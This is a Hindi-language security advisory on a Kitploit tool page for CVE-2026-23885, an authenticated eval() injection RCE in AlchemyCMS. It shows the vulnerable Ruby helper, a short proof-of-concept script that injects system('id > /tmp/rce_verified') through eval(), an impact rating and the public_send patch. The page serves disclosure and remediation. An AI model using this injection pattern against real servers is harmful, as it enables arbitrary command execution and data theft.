Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23885 — CVE-2026-23885 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो AlchemyCMS में eval() इंजेक्शन के माध्यम से एक प्रमाणित RCE है, तकनीकी विश्लेषण और उपचार मार्गदर्शन के साथ। | Kitploit
उपकरण/GitHubGitHub/thedeepopc/cve-2026-23885
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubthedeepopc/cve-2026-23885

CVE-2026-23885

CVE-2026-23885 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो AlchemyCMS में eval() इंजेक्शन के माध्यम से एक प्रमाणित RCE है, तकनीकी विश्लेषण और उपचार मार्गदर्शन के साथ।

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सुरक्षा सलाह: CVE-2026-23885

AlchemyCMS में प्रमाणित रिमोट कोड निष्पादन (RCE)

1. कार्यकारी सारांश

AlchemyCMS फ्रेमवर्क में डायनामिक रूप से मूल्यांकित कोड में निर्देशों का अनुचित न्यूट्रलाइज़ेशन (CWE-95) से संबंधित एक गंभीर सुरक्षा भेद्यता खोजी गई थी। यह भेद्यता प्रशासनिक विशेषाधिकारों वाले एक प्रमाणित उपयोगकर्ता को eval() इंजेक्शन सिंक के माध्यम से होस्ट सर्वर पर मनमाना Ruby कोड और सिस्टम कमांड निष्पादित करने की अनुमति देती है।


2. तकनीकी भेद्यता विश्लेषण

संवेदनशील घटक

  • फ़ाइल: app/helpers/alchemy/resources_helper.rb
  • विधि: Alchemy::ResourcesHelper#resource_url_proxy
  • जोखिम स्तर: मध्यम/उच्च (प्रमाणित RCE)

मूल कारण

हेल्पर विधि resource_handler ऑब्जेक्ट से engine_name विशेषता को असुरक्षित रूप से संसाधित करती है। यह विशेषता बिना किसी पूर्व सैनिटाइज़ेशन या सत्यापन के सीधे Ruby eval() फ़ंक्शन में पारित की जाती है।

root@kitploit:~
def resource_url_proxy(resource_handler)
  if resource_handler.in_engine?
    eval(resource_handler.engine_name) # rubocop:disable Security/Eval
  else
    main_app
  end
end

# rubocop:disable Security/Eval निर्देश की उपस्थिति पुष्टि करती है कि eval() के उपयोग के सुरक्षा निहितार्थों को पहचाना गया था लेकिन कार्यान्वयन के दौरान उन्हें दरकिनार कर दिया गया।

3. प्रमाण-अवधारणा (PoC)

हमला वेक्टर

यह भेद्यता AlchemyCMS प्रशासनिक इंटरफ़ेस के भीतर संसाधन-आधारित दृश्यों (जैसे, साइट्स या भाषाएँ) को प्रस्तुत करते समय ट्रिगर होती है। यदि कोई हमलावर मॉड्यूल कॉन्फ़िगरेशन या अंतर्निहित संसाधन डेटा में हेरफेर कर सकता है, तो वे निष्पादन प्राप्त कर सकते हैं।

स्टैंडअलोन शोषण स्क्रिप्ट

निम्नलिखित स्क्रिप्ट संवेदनशील हेल्पर वातावरण का अनुकरण करके मनमाना कोड निष्पादन प्रदर्शित करती है:

Ruby

root@kitploit:~
require 'ostruct'

def resource_url_proxy(resource_handler)
  if resource_handler.engine_name && !resource_handler.engine_name.empty?
    eval(resource_handler.engine_name)
  end
end

# पेलोड: सिस्टम 'id' कमांड निष्पादित करता है और साक्ष्य फ़ाइल बनाता है
payload = "system('id > /tmp/rce_verified'); 'main_app'"
handler = OpenStruct.new(engine_name: payload)

resource_url_proxy(handler)

निष्पादन का साक्ष्य

निष्पादन पर, सिस्टम कमांड संसाधित होता है, जिससे हमलावर को सर्वर के वातावरण तक पहुंच प्राप्त होती है।

RCE टर्मिनल प्रमाण

4. प्रभाव और गंभीरता

  • गोपनीयता: उच्च। एप्लिकेशन डेटा और पर्यावरण रहस्यों तक पूर्ण पहुंच।
  • अखंडता: उच्च। फ़ाइलों और डेटाबेस रिकॉर्ड को संशोधित करने की क्षमता।
  • उपलब्धता: उच्च। पूर्ण सिस्टम व्यवधान की संभावना।
  • CVE ID: CVE-2026-23885

5. उपचार

इस भेद्यता को निम्नलिखित पैच किए गए संस्करणों में संबोधित किया गया है:

  • 7.4.12
  • 8.0.3

फिक्स में अनुरोधों को इच्छित इंजन प्रॉक्सी तक सुरक्षित रूप से रूट करने के लिए eval() कॉल को public_send() से बदलना शामिल है:

Ruby

root@kitploit:~
main_app.public_send(resource_handler.engine_name) if resource_handler.engine_name.present?
भेद्यता खोज: स्वतंत्र सुरक्षा ऑडिट

CVE संदर्भ: CVE-2026-23885

  • CVE सूची: CVE.org पर CVE-2026-23885
  • भेद्यता विश्लेषण: Tenable CVE-2026-23885 डेटाबेस
  • AlchemyCMS सुरक्षा नीति: सुरक्षा दिशानिर्देश
टूल डाउनलोड करें